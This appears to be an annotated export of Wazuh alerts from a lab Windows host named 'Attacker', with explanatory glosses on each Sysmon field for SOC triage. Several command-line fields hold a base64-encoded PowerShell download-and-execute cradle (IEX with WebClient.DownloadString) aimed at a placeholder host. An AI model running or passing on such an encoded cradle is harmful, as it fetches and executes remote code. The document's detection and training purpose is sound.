No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:18.4933409Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350713
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:15.702 ProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00} ProcessId: 8928 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c18c-680a-f20c-000000000e00} ParentProcessId: 1724 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:15.702
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c18f-680a-f40c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8928
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c18c-680a-f20c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  1724
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:21.113+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:21.113+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  130
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535381.2813943
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:18.7447989Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350714
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:18.693 ProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00} ProcessId: 8928 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_cew1hm2c.hha.ps1 CreationUtcTime: 2025-04-24 22:56:18.689 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:18.693
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c18f-680a-f40c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8928
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cew1hm2c.hha.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:18.689
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:25.282+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:25.282+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  127
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535385.2816708
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:22.6536408Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350737
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:19.920 ProcessGuid: {94294ddc-c193-680a-f60c-000000000e00} ProcessId: 1672 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00} ParentProcessId: 8928 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:19.920
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c193-680a-f60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c18f-680a-f40c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8928
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:25.291+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:25.291+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  131
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535385.2824771
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:22.8755727Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350738
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:22.872 ProcessGuid: {94294ddc-c193-680a-f60c-000000000e00} ProcessId: 1672 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_b1g5bu1u.tbb.ps1 CreationUtcTime: 2025-04-24 22:56:22.872 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:22.872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c193-680a-f60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_b1g5bu1u.tbb.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:22.872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:27.723+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:27.723+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  128
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535387.2827536
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

